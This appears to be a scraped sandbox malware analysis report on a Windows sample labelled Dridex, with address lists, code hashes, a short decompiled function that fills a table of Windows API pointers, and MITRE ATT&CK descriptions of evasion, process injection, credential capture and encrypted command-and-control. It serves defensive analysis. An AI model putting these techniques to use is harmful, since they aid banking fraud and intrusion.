0x6e2e1fb4
0x6e2e1fba
0x6e2e1fbc
0x6e2e2085
0x6e2e2091
0x6e2e2094
0x6e2e2096
0x6e2e20c7
0x6e2e20c7
0x6e2e20c9
0x6e2e20d5
0x6e2e20e0
0x6e2e20e5
0x6e2e1fd6
0x6e2e1fd6
0x6e2e1fd8
0x6e2e1fd8
0x6e2e1fda
0x6e2e1fda
0x6e2e1fdf
0x00000000
0x00000000
0x6e2e1fe1
0x6e2e1fe2
0x6e2e1fe5
0x6e2e1fe8
0x00000000
0x00000000
0x6e2e1fef
0x6e2e1ff4
0x6e2e1ff9
0x6e2e1ffd
0x6e2e2038
0x6e2e203f
0x6e2e2047
0x6e2e204a
0x6e2e204f
0x6e2e2052
0x6e2e2055
0x00000000
0x6e2e2055
0x6e2e1fff
0x6e2e2003
0x6e2e2004
0x6e2e2008
0x6e2e200f
0x6e2e201d
0x6e2e2020
0x6e2e2023
0x6e2e2026
0x6e2e2026
0x6e2e2026
0x6e2e202c
0x00000000
0x6e2e202c
0x6e2e205d
0x6e2e205d
0x6e2e2066
0x6e2e2069
0x6e2e206e
0x00000000
0x6e2e206e
0x6e2e2098
0x6e2e209c
0x6e2e209d
0x6e2e20a1
0x6e2e20a5
0x6e2e20af
0x6e2e20b2
0x6e2e20b5
0x6e2e20b8
0x6e2e20b8
0x6e2e20b8
0x6e2e20bb
0x00000000
0x6e2e20bb
0x6e2e1fc2
0x6e2e1fd2
0x6e2e1fd2
0x6e2e1fd4
0x00000000
0x00000000
0x6e2e1fca
0x6e2e1fcc
0x6e2e1fcc
0x00000000
0x6e2e1fd2
0x6e2e1f9d
0x6e2e1fa3
0x6e2e1fa9
0x6e2e1fa9
0x00000000
0x6e2e1fa3
0x6e2e1f77
0x6e2e1f7b
0x6e2e1f0d
0x00000000
0x6e2e1f0d
0x6e2e1f7d
0x6e2e1f7d
0x00000000
0x6e2e1f7d
0x6e2e1f32
0x6e2e1f32
0x6e2e1f34
0x6e2e1f34
0x6e2e1f38
0x6e2e1f3b
0x6e2e1f3e
0x6e2e1f41
0x6e2e1f47
0x6e2e1f4a
0x6e2e1f51
0x6e2e1f54
0x6e2e1f56
0x00000000
0x00000000
0x6e2e1f58
0x6e2e1f59
0x6e2e1f5e
0x6e2e1f60
0x00000000
0x00000000
0x00000000
0x6e2e1f60
0x00000000
0x6e2e1f34
0x6e2e1f10
0x6e2e1ddd
0x6e2e1ddf
0x6e2e1de5
0x6e2e1df6
0x6e2e1df8
0x6e2e1dfa
0x00000000
0x00000000
0x6e2e1e0d
0x6e2e1e0f
0x6e2e1e11
0x00000000
0x00000000
0x6e2e1e17
0x6e2e1e17
0x6e2e1e1e
0x6e2e1e20
0x6e2e1e23
0x6e2e1e25
0x6e2e1de3
0x6e2e1de3
0x6e2e1de3
0x00000000
0x6e2e1de3
0x6e2e1e2a
0x6e2e1e2c
0x00000000
0x00000000
0x6e2e1e2e
0x6e2e1e30
0x00000000
0x00000000
0x6e2e1e3f
0x6e2e1e4f
0x6e2e1e62
0x6e2e1e64
0x6e2e1e66
0x6e2e1e91
0x6e2e1e9a
0x6e2e1eaa
0x6e2e1eac
0x6e2e1eb5
0x6e2e1ebc
0x6e2e1ecc
0x6e2e1ed3
0x6e2e1ed3
0x6e2e1ee2
0x6e2e1eeb
0x6e2e1ef0
0x6e2e1ef4
0x00000000
0x6e2e1ef4
0x6e2e1e73
0x6e2e1e7a
0x6e2e1e8b
0x6e2e1e8d
0x6e2e1e8f
0x00000000
0x00000000
0x00000000
0x6e2e1e8f
0x6e2e1de5
0x00000000
0x6e2e1d82
0x6e2e1d82
0x6e2e1d8c
0x6e2e207d
0x6e2e207d
0x00000000
0x6e2e1d8c

Memory Dump Source

Source File: 00000003.00000002.428086465.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true

Associated: 00000003.00000002.428073469.000000006E2D0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428112325.000000006E2EA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428123241.000000006E2ED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.428131857.000000006E2EF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf9b7e0e72fcb40a0f47e2f241b324a6ac4b1c0505eef6c2e198e6a7a0220b7
Instruction ID: 944d4bdbcde22d9db2002c17ebede39f7c98a3805a9c5bab24ac27e228e967f6
Opcode Fuzzy Hash: fdf9b7e0e72fcb40a0f47e2f241b324a6ac4b1c0505eef6c2e198e6a7a0220b7
Instruction Fuzzy Hash: DAA1487520832E9FD714DFA5C840BAAB3A7BFD0305FA0C928E59587A80E771D885CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E2D6D50, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E2D6D50() {

				 *0x6e2ed280 = GetUserNameW;
				 *0x6E2ED284 = MessageBoxW;
				 *0x6E2ED288 = GetLastError;
				 *0x6E2ED28C = CreateFileA;
				 *0x6E2ED290 = DebugBreak;
				 *0x6E2ED294 = FlushFileBuffers;
				 *0x6E2ED298 = FreeEnvironmentStringsA;
				 *0x6E2ED29C = GetConsoleOutputCP;
				 *0x6E2ED2A0 = GetEnvironmentStrings;
				 *0x6E2ED2A4 = GetLocaleInfoA;
				 *0x6E2ED2A8 = GetStartupInfoA;
				 *0x6E2ED2AC = GetStringTypeA;
				 *0x6E2ED2B0 = HeapValidate;
				 *0x6E2ED2B4 = IsBadReadPtr;
				 *0x6E2ED2B8 = LCMapStringA;
				 *0x6E2ED2BC = LoadLibraryA;
				 *0x6E2ED2C0 = OutputDebugStringA;
				return 0x6e2ed280;
			}

0x6e2d6d61
0x6e2d6d69
0x6e2d6d6c
0x6e2d6d7b
0x6e2d6d7e
0x6e2d6d8d
0x6e2d6d90
0x6e2d6d9f
0x6e2d6da2
0x6e2d6db1
0x6e2d6db4
0x6e2d6dc3
0x6e2d6dc6
0x6e2d6dd5
0x6e2d6dd8
0x6e2d6de7
0x6e2d6dea
0x6e2d6ded

Memory Dump Source

Source File: 00000003.00000002.428086465.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true

Associated: 00000003.00000002.428073469.000000006E2D0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428112325.000000006E2EA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428123241.000000006E2ED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.428131857.000000006E2EF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b1d15c3eec6cb8bb15d05aaa195761ab1ff4286936a028225fc60a12dfbf312
Instruction ID: 537828d9eef715013a4a523bca782156abf6ddd6a4338744d20efefdba6a6e0a
Opcode Fuzzy Hash: 6b1d15c3eec6cb8bb15d05aaa195761ab1ff4286936a028225fc60a12dfbf312
Instruction Fuzzy Hash: 0911E3F8915A20CFC748CF05D198A617BF3BB8D31035285AAD8094B366D7B4D945CF74

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.Variant.Graftor.981531.21000.9246

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6E5648FD, Relevance: 5.0, Strings: 4, Instructions: 49
COMMON

Function 02841F54, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185
memoryCOMMON

Function 6E2E3600, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6E2E0754, Relevance: 1.9, Strings: 1, Instructions: 650
COMMONCrypto

Function 6E2D1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6E2DA52C, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6E2D846C, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6E2E9348, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6E2E1460, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6E2E1D58, Relevance: .3, Instructions: 282
COMMONCrypto

Function 6E2D6D50, Relevance: .0, Instructions: 36
COMMON